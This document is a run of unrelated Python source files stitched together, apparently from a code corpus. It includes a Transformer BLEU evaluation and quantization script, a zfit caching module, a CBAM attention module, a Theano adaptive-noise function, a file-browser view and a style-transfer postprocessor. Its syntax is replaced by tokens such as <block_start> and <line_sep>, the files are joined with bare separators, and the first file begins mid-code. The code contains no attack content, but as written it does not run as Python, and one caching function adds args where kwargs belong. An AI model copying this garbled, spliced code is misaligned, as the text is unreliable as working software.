self<block_start>punctuation=self.property_chars("P")<line_sep>self.nondigit_punct_re=re.compile(r"([^\d])(["+punctuation+r"])")<line_sep>self.punct_nondigit_re=re.compile(r"(["+punctuation+r"])([^\d])")<line_sep>self.symbol_re=re.compile("(["+self.property_chars("S")+"])")<block_end><def_stmt>property_chars self prefix<block_start><return>"".join(six.unichr(x)<for>x range(sys.maxunicode)<if>unicodedata.category(six.unichr(x)).startswith(prefix))<block_end><block_end>uregex=UnicodeRegex()<def_stmt>bleu_tokenize string<block_start>string=uregex.nondigit_punct_re.sub(r"\1 \2 " string)<line_sep>string=uregex.punct_nondigit_re.sub(r" \1 \2" string)<line_sep>string=uregex.symbol_re.sub(r" \1 " string)<line_sep><return>string.split()<block_end><class_stmt>bleu(object)<block_start><def_stmt>__init__ self<block_start>self.translations=[]<line_sep>self.labels=[]<block_end><def_stmt>reset self<block_start>self.translations=[]<line_sep>self.labels=[]<block_end><def_stmt>update self pred label<block_start><if_stmt>len(label)<ne>len(pred)<block_start><raise>ValueError("Reference and translation files have different number "<concat>"of lines. If training only a few steps (100-200), the "<concat>"translation may be empty.")<block_end>label=[x.lower()<for>x label]<line_sep>pred=[x.lower()<for>x pred]<line_sep>label=[bleu_tokenize(x)<for>x label]<line_sep>pred=[bleu_tokenize(x)<for>x pred]<line_sep>self.labels.extend(label)<line_sep>self.translations.extend(pred)<block_end><def_stmt>result self<block_start><return>metrics.compute_bleu(self.labels self.translations)<times>100<block_end><block_end><def_stmt>collate_fn batch<block_start>"""Puts each data field into a pd frame with outer dimension batch size"""<line_sep>elem=batch[0]<if_stmt>isinstance(elem tuple)<block_start>batch=zip(*batch)<line_sep><return>[collate_fn(samples)<for>samples batch]<block_end><elif_stmt>isinstance(elem np.ndarray)<block_start><return>[list(elem)<for>elem batch]<block_end><elif_stmt>isinstance(elem str)<block_start><return>batch<block_end><else_stmt><block_start><return>pd.DataFrame(batch).fillna(0).values.astype(np.int32)<block_end><block_end><def_stmt>load_graph file_name<block_start>tf.compat.v1.logging.info('Loading graph from: '+file_name)<with_stmt>tf.io.gfile.GFile(file_name "rb")<as>f<block_start>graph_def=tf.compat.v1.GraphDef()<line_sep>graph_def.ParseFromString(f.read())<block_end><with_stmt>tf.Graph().as_default()<as>graph<block_start>tf.import_graph_def(graph_def name='')<block_end><return>graph<block_end><def_stmt>eval_func infer_graph iteration=-1<block_start><if_stmt>isinstance(infer_graph tf.compat.v1.GraphDef)<block_start>graph=tf.Graph()<with_stmt>graph.as_default()<block_start>tf.import_graph_def(infer_graph name='')<block_end>infer_graph=graph<block_end>subtokenizer=Subtokenizer(FLAGS.vocab_file)<line_sep>input_tensor=infer_graph.get_tensor_by_name('input_tensor:0')<line_sep>output_tensor=infer_graph.get_tensor_by_name('model/Transformer/strided_slice_19:0')<line_sep>ds=Dataset(FLAGS.inputs_file FLAGS.reference_file FLAGS.vocab_file)<import_from_stmt>neural_compressor.data DATALOADERS<line_sep>dataloader=DATALOADERS['tensorflow'](ds batch_size=FLAGS.batch_size collate_fn=collate_fn)<line_sep>config=tf.compat.v1.ConfigProto()<line_sep>config.use_per_session_threads=1<line_sep>config.inter_op_parallelism_threads=1<line_sep>sess=tf.compat.v1.Session(graph=infer_graph config=config)<line_sep>time_list=[]<line_sep>bleu_eval=bleu()<line_sep>predictions=[]<line_sep>labels=[]<line_sep>warmup=10<if_stmt>iteration<ne>-1<block_start><assert_stmt>iteration<ge>warmup 'iteration must be larger than warmup'<block_end><for_stmt>idx,(input_data label) enumerate(dataloader)<block_start><if_stmt>idx<l>iteration<or>iteration<eq>-1<block_start>time_start=time.time()<line_sep>out=sess.run([output_tensor] {input_tensor:input_data})<line_sep>duration=time.time()-time_start<line_sep>time_list.append(duration)<line_sep>predictions.append(out)<line_sep>labels.extend(label)<block_end><else_stmt><block_start><break><block_end><block_end>latency=np.array(time_list[warmup:]).mean()/FLAGS.batch_size<line_sep>print('Batch size = {}'.format(FLAGS.batch_size))<line_sep>print('Latency: {:.3f} ms'.format(latency<times>1000))<line_sep>print('Throughput: {:.3f} items/sec'.format(1./latency))<line_sep># only calculate accuracy when running out all predictions
<if_stmt>iteration<eq>-1<block_start>decode=[]<for_stmt>i,tr enumerate(predictions)<block_start><for_stmt>j,itr enumerate(tr)<block_start><for_stmt>k,otr enumerate(itr)<block_start><try_stmt><block_start>index=list(otr).index(tokenizer.EOS_ID)<line_sep>decode.append(subtokenizer.decode(otr[:index]))<block_end><except_stmt><block_start>decode.append(subtokenizer.decode(otr))<block_end><block_end><block_end><block_end>bleu_eval.update(decode labels)<line_sep>print('Accuracy is {:.3f}'.format(bleu_eval.result()))<line_sep><return>bleu_eval.result()<block_end><block_end><class_stmt>Dataset(object)<block_start><def_stmt>__init__ self inputs_file reference_file vocab_file<block_start><with_stmt>tf.io.gfile.GFile(inputs_file)<as>f<block_start>records=f.read().split("\n")<line_sep>inputs=[record.strip()<for>record records]<if_stmt><not>inputs[-1]<block_start>inputs.pop()<block_end><block_end>self.ref_lines=tokenizer.native_to_unicode(tf.io.gfile.GFile(reference_file).read()).strip().splitlines()<line_sep>subtokenizer=Subtokenizer(vocab_file)<line_sep>self.batch=[]<line_sep>token_lens=[]<for_stmt>i,line enumerate(inputs)<block_start>enc=subtokenizer.encode(line add_eos=<true>)<line_sep>token_lens.append((i len(enc)))<block_end>sorted_by_token_input_lens=sorted(token_lens key=<lambda>x:x[1] reverse=<true>)<line_sep>sorted_inputs=[<none>]<times>len(sorted_by_token_input_lens)<line_sep>sorted_keys=[0]<times>len(sorted_by_token_input_lens)<line_sep>lines=[]<for_stmt>i,(index _) enumerate(sorted_by_token_input_lens)<block_start>sorted_inputs[i]=inputs[index]<line_sep>sorted_keys[index]=i<line_sep>enc=subtokenizer.encode(sorted_inputs[i] add_eos=<true>)<line_sep>lines.append([enc])<block_end><for_stmt>i sorted_keys<block_start>self.batch.append(lines[i])<block_end><block_end><def_stmt>__getitem__ self index<block_start>data=self.batch[index]<line_sep>label=self.ref_lines[index]<line_sep><return>data[0] label<block_end><def_stmt>__len__ self<block_start><return>len(self.batch)<block_end><block_end><def_stmt>main _<block_start>graph=load_graph(FLAGS.input_graph)<if_stmt>FLAGS.mode<eq>'tune'<block_start><import_from_stmt>neural_compressor.experimental Quantization common<line_sep>quantizer=Quantization(FLAGS.config)<line_sep>ds=Dataset(FLAGS.inputs_file FLAGS.reference_file FLAGS.vocab_file)<line_sep>quantizer.calib_dataloader=common.DataLoader(ds collate_fn=collate_fn batch_size=FLAGS.batch_size)<line_sep>quantizer.model=common.Model(graph)<line_sep>quantizer.eval_func=eval_func<line_sep>q_model=quantizer.fit()<try_stmt><block_start>q_model.save(FLAGS.output_model)<block_end><except_stmt>Exception<as>e<block_start>print("Failed to save model due to {}".format(str(e)))<block_end><block_end><elif_stmt>FLAGS.mode<eq>'benchmark'<block_start>eval_func(graph FLAGS.iters)<block_end><elif_stmt>FLAGS.mode<eq>'accuracy'<block_start>eval_func(graph -1)<block_end><block_end><if_stmt>__name__<eq>"__main__"<block_start>tf.compat.v1.app.run()<block_end> |
"""Contains config file interfaces."""<line_sep> |
"""Module for caching.
The basic concept of caching in Zfit builds on a "cacher", that caches a certain value and that
is dependent of "cache_dependents". By implementing `ZfitCachable`, an object will be able to play both
roles. And most importantly, it has a `_cache` dict, that contains all the cache.
Basic principle
===============
A "cacher" adds any dependents that it may comes across with `add_cache_dependents`. For example,
for a loss this would be all pdfs and data. Since :py:class:`~zfit.Space` is immutable, there is no need to add this
as a dependent. This leads to the "cache_dependent" to register the "cacher" and to remember it.
In case, any "cache_dependent" changes in a way the cache of itself (and any "cacher") is invalid,
which is done in the simplest case by decorating a method with `@invalidates_cache`, the "cache_dependent":
* clears it's own cache with `reset_cache_self` and
* "clears" any "cacher"s cache with `reset_cache(reseter=self)`, telling the "cacher" that it should
reset the cache. This is also where more fine-grained control (depending on which "cache_dependent"
calls `reset_cache`) can be brought into play.
Example with a pdf that caches the normalization:
.. code:: python
class Parameter(Cachable):
def load(new_value): # does not require to build a new graph
# do something
@invalidates_cache
def change_limits(new_limits): # requires to build a new graph (as an example)
# do something
# create param1, param2 from `Parameter`
class MyPDF(Cachable):
def __init__(self, param1, param2):
self.add_cache_dependents([param1, param2])
def cached_func(...):
if self._cache.get('my_name') is None:
result = ... # calculations here
self._cache['my_name']
else:
result = self._cache['my_name']
return result
"""<line_sep># Copyright (c) 2021 zfit
<import_stmt>functools<import_stmt>weakref<import_from_stmt>abc abstractmethod<import_from_stmt>typing Iterable Mapping Union<import_stmt>numpy<as>np<import_stmt>tensorflow<as>tf<import_from_stmt>. ztyping<import_from_stmt>.container convert_to_container<class_stmt>ZfitGraphCachable<block_start>@abstractmethod<def_stmt>register_cacher self cacher:"ZfitGraphCachable"<block_start><raise>NotImplementedError<block_end>@abstractmethod<def_stmt>add_cache_deps self cache_dependents allow_non_cachable<block_start>"""Add dependents that render the cache invalid if they change.
Args:
cache_dependents:
allow_non_cachable: If `True`, allow `cache_dependents` to be non-cachables.
If `False`, any `cache_dependents` that is not a `ZfitCachable` will raise an error.
Raises:
TypeError: if one of the `cache_dependents` is not a `ZfitCachable` _and_ `allow_non_cachable`
if `False`.
"""<line_sep><pass><block_end>@abstractmethod<def_stmt>reset_cache_self self<block_start>"""Clear the cache of self and all dependent cachers."""<line_sep><pass><block_end>@abstractmethod<def_stmt>reset_cache self reseter<block_start><pass><block_end><block_end><class_stmt>GraphCachable(ZfitGraphCachable)<block_start>graph_caching_methods=[]<line_sep>instances=weakref.WeakSet()<def_stmt>__init__ self *args **kwargs<block_start>self._cache={}<line_sep>self._cachers=weakref.WeakKeyDictionary()<line_sep>self.reset_cache_self()<line_sep>self.instances.add(self)<line_sep>super().__init__(*args **kwargs)<block_end><def_stmt>__init_subclass__ cls<arrow><none><block_start>super().__init_subclass__()<line_sep>graph_caching_methods=[]<for_stmt>func_name dir(cls)<block_start><if_stmt><not>func_name.startswith("__")<block_start>func=getattr(cls func_name)<if_stmt>callable(func)<and>hasattr(func 'zfit_graph_cache_registered')# assert hasattr(func, "_descriptor_cache"), "TensorFlow internals have changed. Need to update cache"
<block_start>func.zfit_graph_cache_registered=<true><line_sep>graph_caching_methods.append(func)<block_end><block_end><block_end>cls.graph_caching_methods=graph_caching_methods<block_end><def_stmt>register_cacher self cacher:ztyping.CacherOrCachersType<block_start>"""Register a `cacher` that caches values produces by this instance; a dependent.
Args:
cacher:
"""<if_stmt><not>isinstance(cacher ZfitGraphCachable)<block_start><raise>TypeError(f"`cacher` is not a `ZfitCachable` but {type(cacher)}")<block_end><if_stmt><not>cacher<in>self._cachers<block_start>self._cachers[cacher]=<none><block_end><block_end># could we have a more useful value?
<def_stmt>add_cache_deps self cache_deps:ztyping.CacherOrCachersType allow_non_cachable:bool=<true><block_start>"""Add dependencies that render the cache invalid if they change.
Args:
cache_deps:
allow_non_cachable: If `True`, allow `cache_dependents` to be non-cachables.
If `False`, any `cache_dependents` that is not a `ZfitCachable` will raise an error.
Raises:
TypeError: if one of the `cache_dependents` is not a `ZfitCachable` _and_ `allow_non_cachable`
if `False`.
"""<line_sep>cache_deps=convert_to_container(cache_deps)<for_stmt>cache_dep cache_deps<block_start><if_stmt>isinstance(cache_dep ZfitGraphCachable)<block_start>cache_dep.register_cacher(self)<block_end><elif_stmt><not>allow_non_cachable<block_start><raise>TypeError("cache_dependent {} is not a `ZfitCachable` but {}".format(cache_dep type(cache_dep)))<block_end><block_end><block_end><def_stmt>reset_cache_self self<block_start>"""Clear the cache of self and all dependent cachers."""<line_sep>self._clean_cache()<line_sep>self._inform_cachers()<block_end><def_stmt>reset_cache self reseter:'ZfitGraphCachable'<block_start>self.reset_cache_self()<block_end><def_stmt>_clean_cache self# for func_holder in self.graph_caching_methods:
# func_holder.reset
<block_start>self._cache={}<line_sep><return><block_end><def_stmt>_inform_cachers self<block_start><for_stmt>cacher self._cachers<block_start>cacher.reset_cache(reseter=self)<block_end><block_end><block_end><def_stmt>invalidate_graph func<block_start>@functools.wraps(func)<def_stmt>wrapped_func *args **kwargs<block_start>self=args[0]<if_stmt><not>isinstance(self ZfitGraphCachable)<block_start><raise>TypeError("Decorator can only be used in a subclass of `ZfitCachable`")<block_end>self.reset_cache(reseter=self)<line_sep><return>func(*args **kwargs)<block_end><return>wrapped_func<block_end><class_stmt>FunctionCacheHolder(GraphCachable)<block_start>IS_TENSOR=object()<def_stmt>__init__ self func wrapped_func cachables:Union[ZfitGraphCachable object Iterable[Union[ZfitGraphCachable object]]]=<none> cachables_mapping=<none><block_start>"""`tf.function` decorated function holder with caching dependencies on inputs.
A `tf.function` creates a new graph for every signature that is encountered. It automatically caches them but
thereby assumes that Python objects are immutable. Any mutation won't be detected. Therefore, an extra wrapper
is needed. The input signature is compared with firstly checking whether the function is the same and then
doing an equal comparison of the arguments (maybe too costly?).
The `FunctionCacheHolder` holds the
- original python function which serves as the hash of the object
- wrapped python function, `wrapped_func`
- the (keyword-)arguments
If any of the keyword arguments changes in a way that the graph cache is invalid, this holder will have
`is_valid` set to False and the `wrapped_func` cannot be used anymore, instead a new `tf.function` should
be created as a call to the `wrapped_func` with the given arguments will result in an outdated graph.
Args:
func: Python function that serves as a hash of the holder. Notice that equality is different
defined.
wrapped_func: Wrapped `func` with `tf.function`. The holder signals via
`is_valid` whether this function is still valid to be used.
cachables: objects that are cached. If they change, the cache is invalidated
cachables_mapping: keyword arguments to the function. If the values change, the cache is
invalidated.
"""<line_sep># cache = {} if cache is None else cache
self.delete_from_cache=<false><line_sep>self.wrapped_func=wrapped_func<line_sep># self.parent_cache = cache
self.python_func=func<line_sep>self._hash_value=hash(self.python_func)<if_stmt>cachables<is><none><and>cachables_mapping<is><none><block_start><raise>ValueError("Both `cachables and `cachables_mapping` are None. One needs to be different from None.")<block_end><if_stmt>cachables<is><none><block_start>cachables=[]<block_end><if_stmt>cachables_mapping<is><none><block_start>cachables_mapping={}<block_end>cachables=convert_to_container(cachables container=list)<line_sep>cachables_values=convert_to_container(cachables_mapping.values() container=list)<line_sep>cachables_all=cachables+cachables_values<line_sep>self.immutable_representation=self.create_immutable(cachables cachables_mapping)<line_sep># self._hash_value = hash(self.immutable_representation)
super().__init__()# resets the cache
self.add_cache_deps(cachables_all)<line_sep>self.is_valid=<true><block_end># needed to make the cache valid again
<def_stmt>reset_cache_self self<block_start>self.is_valid=<false><block_end><def_stmt>create_immutable self args kwargs<block_start>"""Create a tuple of the args and kwargs by combining them as args + kwargs.keys() + kwargs.values()`
Args:
args: list like
kwargs: dict-like
Returns:
"""<line_sep># is initialized before the core
<import_from_stmt>..core.interfaces ZfitData ZfitParameter ZfitSpace<line_sep>args=list(args)<line_sep>kwargs=list(kwargs.keys())+list(kwargs.values())<line_sep>combined=[]<if_stmt>args<ne>[]<block_start>combined<augadd>args<block_end><if_stmt>kwargs<ne>[]<block_start>combined<augadd>args<block_end>combined_cleaned=[]<for_stmt>obj combined<block_start><if_stmt>isinstance(obj ZfitData)<block_start>obj=(id(obj) )<block_end><elif_stmt>isinstance(obj ZfitParameter)<block_start>obj=(ZfitParameter obj.name)<block_end><elif_stmt>isinstance(obj ZfitSpace)<block_start>obj=(id(obj) )<block_end><elif_stmt>tf.is_tensor(obj)<block_start>obj=self.IS_TENSOR<block_end><elif_stmt>isinstance(obj np.ndarray)<block_start>obj=(obj )<if>sum(obj.shape)<l>20<else>id(obj)<block_end>combined_cleaned.append(obj)<block_end><return>tuple(combined_cleaned)<block_end><def_stmt>__hash__ self<arrow>int<block_start><return>self._hash_value<block_end><def_stmt>__eq__ self other:object<arrow>bool<block_start><if_stmt><not>isinstance(other FunctionCacheHolder)<block_start><return><false><block_end># return all(obj1 == obj2 for obj1, obj2 in zip(self.immutable_representation, other.immutable_representation))
array_repr_self=np.array(self.immutable_representation dtype=object)<line_sep>array_repr_other=np.array(other.immutable_representation dtype=object)<try_stmt><block_start><return>all(np.equal(array_repr_self array_repr_other))<block_end><except_stmt>ValueError# broadcasting does not work
<block_start><return><false><block_end><except_stmt>TypeError# OperatorNotAllowedError inherits from this
<block_start><return><false><block_end># TODO: activate the below? costly, but runs?
# except OperatorNotAllowedInGraphError: # we have to assume they're not the same
# return False
<block_end><def_stmt>__repr__ self<arrow>str<block_start><return>f"<FunctionCacheHolder: {self.python_func}, valid={self.is_valid}>"<block_end><block_end><def_stmt>clear_graph_cache <block_start><import_from_stmt>zfit.z.zextension FunctionWrapperRegistry<for_stmt>registry FunctionWrapperRegistry.registries<block_start><for_stmt>all_meth registry.function_cache.values()<block_start><for_stmt>wrapped_meth all_meth<block_start>wrapped_meth=wrapped_meth.wrapped_func<line_sep>wrapped_meth._created_variables=<none><line_sep>wrapped_meth._stateful_fn=<none><line_sep>wrapped_meth._stateless_fn=<none><line_sep>wrapped_meth._descriptor_cache.clear()<block_end><block_end><block_end><for_stmt>registry FunctionWrapperRegistry.registries<block_start>registry.reset()<block_end><for_stmt>instance GraphCachable.instances<block_start>instance.reset_cache('global')<block_end># Cachable.graph_caching_methods.clear()
tf.compat.v1.reset_default_graph()<block_end> |
"""
This model is based on the implementation of https://github.com/Jongchan/attention-module.
"""<import_from_stmt>functools partial<import_stmt>torch<import_stmt>torch.nn<as>nn<import_from_stmt>einops reduce rearrange<import_stmt>models.layers<as>layers<class_stmt>ChannelGate(nn.Module)<block_start><def_stmt>__init__ self channel reduction=16 max_pool=<true><block_start>super().__init__()<line_sep>self.pools=[]<line_sep>self.pools.append(nn.AdaptiveAvgPool2d((1 1)))<line_sep>self.pools.append(nn.AdaptiveMaxPool2d((1 1)))<line_sep>self.pools=self.pools<if>max_pool<else>self.pools[:1]<line_sep>self.ff=nn.Sequential(layers.dense(channel channel<floordiv>reduction bias=<false>) layers.relu() layers.dense(channel<floordiv>reduction channel bias=<false>) )<line_sep>self.prob=nn.Sigmoid()<block_end><def_stmt>forward self x<block_start>b,c,h,w=x.shape<line_sep>s=torch.cat([pool(x)<for>pool self.pools] dim=-1)<line_sep>s=rearrange(s "b c n m -> b (n m) c")<line_sep>s=self.ff(s)<line_sep>s=reduce(s "b n c -> b c" "mean")<line_sep>s=self.prob(s)<line_sep>s=s.view(b c 1 1)<line_sep><return>x<times>s<block_end><block_end><class_stmt>SpatialGate(nn.Module)<block_start><def_stmt>__init__ self kernel_size=7 max_pool=<true><block_start>super().__init__()<line_sep>self.pools=[]<line_sep>self.pools.append(partial(torch.mean dim=1 keepdim=<true>))<line_sep>self.pools.append(<lambda>x:partial(torch.max dim=1 keepdim=<true>)(x)[0])<line_sep>self.pools=self.pools<if>max_pool<else>self.pools[:1]<line_sep>self.ff=nn.Sequential(layers.convnxn(len(self.pools) 1 kernel_size=7 stride=1 padding=(kernel_size-1)<floordiv>2) layers.bn(1))<line_sep>self.prob=nn.Sigmoid()<block_end><def_stmt>forward self x<block_start>s=torch.cat([pool(x)<for>pool self.pools] dim=1)<line_sep>s=self.ff(s)<line_sep>s=self.prob(s)<line_sep><return>x<times>s<block_end><block_end> |
'''
Functions similar to blocks.graph
'''<import_stmt>logging<import_stmt>numpy<import_stmt>theano<import_from_stmt>theano tensor<import_from_stmt>theano.sandbox.rng_mrg MRG_RandomStreams<import_from_stmt>blocks.config config<import_from_stmt>blocks.bricks.base Brick application<import_from_stmt>picklable_itertools.extras equizip<import_from_stmt>blocks.graph ComputationGraph<import_from_stmt>collections OrderedDict<line_sep>logger=logging.getLogger(__name__)<class_stmt>NoiseBrick(Brick)<block_start>"""
A brick to hold parameters introducd by adaptive noise.
For each model parameter, adaptive noise adds its standard deviations.
These new parameters will be held by this brick.
Do not use this brick directly! Its main purpose is to hold noise
parameters and to wrap the new cost.
"""<def_stmt>__init__ self<block_start>super(NoiseBrick self).__init__(name='adaptive_noise')<line_sep>self.parameters=[]<line_sep>self.allocated=<true><line_sep>self.initialized=<true><block_end>@application(inputs=['train_cost' 'model_cost' 'model_prior_mean' 'model_prior_variance'] outputs=['total_cost'])<def_stmt>apply self application_call train_cost model_cost model_prior_mean model_prior_variance# We need to add those as auxiliary variables, as they are not
# used to compute the output, and therefore are lost
<block_start>application_call.add_auxiliary_variable(model_prior_mean.copy() name='model_prior_mean')<line_sep>application_call.add_auxiliary_variable(model_prior_variance.copy() name='model_prior_variance')<line_sep>total_cost=train_cost+model_cost<line_sep>total_cost.name='total_cost'<line_sep><return>total_cost<block_end><block_end><def_stmt>__get_name param<block_start>brick=<none><for_stmt>annotation param.tag.annotations<block_start><if_stmt>isinstance(annotation Brick)<block_start>brick=annotation<line_sep><break><block_end><block_end>brick_hierarchy=[brick]<while_stmt>brick_hierarchy[-1].parents<block_start>brick_hierarchy.append(brick_hierarchy[-1].parents[0])<block_end>name="{}.{}".format('/'.join((b.name<for>b brick_hierarchy[::-1])) param.name)<line_sep><return>name<block_end><def_stmt>apply_adaptive_noise computation_graph cost variables num_examples parameters=<none> init_sigma=1e-6 model_cost_coefficient=1.0 seed=<none> gradients=<none> <block_start>"""Add adaptive noise to parameters of a model.
Each of the given variables will be replaced by a normal
distribution with learned mean and standard deviation.
A model cost is computed based on the precision of the the distributions
associated with each variable. It is added to the given cost used to
train the model.
See: <NAME> "Practical Variational Inference for Neural Networks",
NIPS 2011
Parameters
----------
computation_graph : instance of :class:`ComputationGraph`
The computation graph.
cost : :class:`~tensor.TensorVariable`
The cost without weight noise. It should be a member of the
computation_graph.
variables : :class:`~tensor.TensorVariable`
Variables to add noise to.
num_examples : int
Number of training examples. The cost of the model is divided by
the number of training examples, please see
<NAME> "Practical Variational Inference for Neural Networks"
for justification
parameters : list of :class:`~tensor.TensorVariable`
parameters of the model, if gradients are given the list will not
be used. Otherwise, it will be used to compute the gradients
init_sigma : float,
initial standard deviation of noise variables
model_cost_coefficient : float,
the weight of the model cost
seed : int, optional
The seed with which
:class:`~theano.sandbox.rng_mrg.MRG_RandomStreams` is initialized,
is set to 1 by default.
gradients : dict, optional
Adaptive weight noise introduces new parameters for which new cost
and gradients must be computed. Unless the gradients paramter is
given, it will use theano.grad to get the gradients
Returns
-------
cost : :class:`~tensor.TensorVariable`
The new cost
computation_graph : instance of :class:`ComputationGraph`
new graph with added noise.
gradients : dict
a dictionary of gradients for all parameters: the original ones
and the adaptive noise ones
noise_brick : :class:~lvsr.graph.NoiseBrick
the brick that holds all noise parameters and whose .apply method
can be used to find variables added by adaptive noise
"""<if_stmt><not>seed<block_start>seed=config.default_seed<block_end>rng=MRG_RandomStreams(seed)<try_stmt><block_start>cost_index=computation_graph.outputs.index(cost)<block_end><except_stmt>ValueError<block_start><raise>ValueError("cost is not part of the computation_graph")<block_end><if_stmt>gradients<is><none><block_start><if_stmt>parameters<is><none><block_start><raise>ValueError("Either gradients or parameters must be given")<block_end>logger.info("Taking the cost gradient")<line_sep>gradients=dict(equizip(parameters tensor.grad(cost parameters)))<block_end><else_stmt><block_start><if_stmt>parameters<is><not><none><block_start>logger.warn("Both gradients and parameters given, will ignore"<concat>"parameters")<block_end>parameters=gradients.keys()<block_end>gradients=OrderedDict(gradients)<line_sep>log_sigma_scale=2048.0<line_sep>P_noisy=variables# We will add noise to these
Beta=[]# will hold means, log_stdev and stdevs
P_with_noise=[]# will hold parames with added noise
# These don't change
P_clean=list(set(parameters).difference(P_noisy))<line_sep>noise_brick=NoiseBrick()<for_stmt>p P_noisy<block_start>p_u=p<line_sep>p_val=p.get_value(borrow=<true>)<line_sep>p_ls2=theano.shared((numpy.zeros_like(p_val)+numpy.log(init_sigma)<times>2./log_sigma_scale).astype(dtype=numpy.float32))<line_sep>p_ls2.name=__get_name(p_u)<line_sep>noise_brick.parameters.append(p_ls2)<line_sep>p_s2=tensor.exp(p_ls2<times>log_sigma_scale)<line_sep>Beta.append((p_u p_ls2 p_s2))<line_sep>p_noisy=p_u+rng.normal(size=p_val.shape)<times>tensor.sqrt(p_s2)<line_sep>p_noisy=tensor.patternbroadcast(p_noisy p.type.broadcastable)<line_sep>P_with_noise.append(p_noisy)<block_end># compute the prior mean and variation
temp_sum=0.0<line_sep>temp_param_count=0.0<for_stmt>p_u,unused_p_ls2,unused_p_s2 Beta<block_start>temp_sum=temp_sum+p_u.sum()<line_sep>temp_param_count=temp_param_count+p_u.shape.prod()<block_end>prior_u=tensor.cast(temp_sum/temp_param_count 'float32')<line_sep>temp_sum=0.0<for_stmt>p_u,unused_ls2,p_s2 Beta<block_start>temp_sum=temp_sum+(p_s2).sum()+(((p_u-prior_u)<power>2).sum())<block_end>prior_s2=tensor.cast(temp_sum/temp_param_count 'float32')<line_sep># convert everything to use the noisy parameters
full_computation_graph=ComputationGraph(computation_graph.outputs+gradients.values())<line_sep>full_computation_graph=full_computation_graph.replace(dict(zip(P_noisy P_with_noise)))<line_sep>LC=0.0# model cost
<for_stmt>p_u,p_ls2,p_s2 Beta<block_start>LC=(LC+0.5<times>((tensor.log(prior_s2)-p_ls2<times>log_sigma_scale).sum())+1.0/(2.0<times>prior_s2)<times>(((p_u-prior_u)<power>2)+p_s2-prior_s2).sum())<block_end>LC=LC/num_examples<times>model_cost_coefficient<line_sep>train_cost=noise_brick.apply(full_computation_graph.outputs[cost_index].copy() LC prior_u prior_s2)<line_sep>gradients=OrderedDict(zip(gradients.keys() full_computation_graph.outputs[-len(gradients):]))<line_sep>#
# Delete the gradients form the computational graph
#
<del_stmt>full_computation_graph.outputs[-len(gradients):]<line_sep>new_grads={p:gradients.pop(p)<for>p P_clean}<line_sep>#
# Warning!!!
# This only works for batch size 1 (we want that the sum of squares
# be the square of the sum!
#
diag_hessian_estimate={p:g<power>2<for>p,g gradients.iteritems()}<for_stmt>p_u,p_ls2,p_s2 Beta<block_start>p_grad=gradients[p_u]<line_sep>p_u_grad=(model_cost_coefficient<times>(p_u-prior_u)/(num_examples<times>prior_s2)+p_grad)<line_sep>p_ls2_grad=(numpy.float32(model_cost_coefficient<times>0.5/num_examples<times>log_sigma_scale)<times>(p_s2/prior_s2-1.0)+(0.5<times>log_sigma_scale)<times>p_s2<times>diag_hessian_estimate[p_u])<line_sep>new_grads[p_u]=p_u_grad<line_sep>new_grads[p_ls2]=p_ls2_grad<block_end><return>train_cost full_computation_graph new_grads noise_brick<block_end> |
# -*- coding: utf-8 -*-
<import_from_future_stmt> absolute_import<import_stmt>json<import_from_stmt>vilya.libs.template st<import_from_stmt>vilya.models.project CodeDoubanProject<line_sep>_q_exports=[]<class_stmt>BrowsefilesUI<block_start>_q_exports=['setting']<def_stmt>__init__ self proj_name<block_start>self.proj=proj_name<block_end><def_stmt>_q_access self request<block_start><if_stmt>'json'<in>request.environ['HTTP_ACCEPT']<block_start>self.output='json'<block_end><else_stmt><block_start>self.output='html'<block_end><block_end><def_stmt>_q_index self request<block_start>project=CodeDoubanProject.get_by_name(self.proj)<line_sep>user=request.user<line_sep>path=request.get_form_var('path' '')<line_sep>rev=request.get_form_var('rev' project.default_branch)<line_sep>allfiles=project.repo.get_tree(rev path=path)<line_sep>allfiles=[_add_file_type_and_warns(f)<for>f allfiles]<line_sep>errors=''<line_sep>project_name=self.proj<line_sep>project=CodeDoubanProject.get_by_name(project_name)<line_sep>ref=rev<if_stmt>ref<is><none><block_start>ref=project.default_branch<block_end>branches=project.repo.branches<line_sep>tags=project.repo.tags<line_sep>ref_type='branch'<if>ref<in>branches<else>'tag'<if>ref<in>tags<else>'tree'<if_stmt>self.output<eq>'json'<block_start><return>json.dumps(allfiles)<block_end><else_stmt><block_start><return>st('browsefiles.html' **locals())<block_end><block_end><block_end><def_stmt>_add_file_type_and_warns node<block_start>code_file_exts='py rb c h html mako ptl js css less handlebars coffee sql'.split()# noqa
bad_exts='pyc exe'.split()<line_sep>node_ext=node['path'].rsplit('.')[1]<if>'.'<in>node['path']<else>''<if_stmt>node['type']<eq>'tree'<block_start>icon_type='directory'<block_end><elif_stmt>node['type']<eq>'commit'<block_start>icon_type='submodule'<block_end><elif_stmt>node_ext<in>code_file_exts<block_start>icon_type='code-file'<block_end><else_stmt><block_start>icon_type='text-file'<block_end>node['icon-type']=icon_type<if_stmt>node_ext<in>bad_exts<block_start>node['warn']='bad'<block_end><else_stmt><block_start>node['warn']='no'<block_end><return>node<block_end> |
"""
Copyright (c) 2018-2022 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""<import_stmt>numpy<as>np<import_from_stmt>PIL Image<import_from_stmt>..postprocessor Postprocessor<import_from_stmt>..representation StyleTransferAnnotation StyleTransferPrediction<import_from_stmt>..config NumberField<import_from_stmt>..utils get_size_from_config<class_stmt>ResizeStyleTransfer(Postprocessor)<block_start>__provider__='resize_style_transfer'<line_sep>annotation_types=(StyleTransferAnnotation )<line_sep>prediction_types=(StyleTransferPrediction )<line_sep>@classmethod<def_stmt>parameters cls<block_start>parameters=super().parameters()<line_sep>parameters.update({'dst_width':NumberField(value_type=int optional=<false> min_value=1 description="Destination width for resizing.") 'dst_height':NumberField(value_type=int optional=<false> min_value=1 description="Destination height for resizing.")})<line_sep><return>parameters<block_end><def_stmt>configure self<block_start>self.dst_height,self.dst_width=get_size_from_config(self.config allow_none=<true>)<block_end><def_stmt>process_image self annotation prediction<block_start><for_stmt>target annotation<block_start><if_stmt>target<is><none><block_start><continue><block_end>data=Image.fromarray(target.value)<line_sep>data=data.resize((self.dst_width self.dst_height) Image.BICUBIC)<line_sep>target.value=np.array(data)<block_end><return>annotation prediction<block_end><block_end> |
# Copyright (c) 1996-2015 PSERC. All rights reserved.
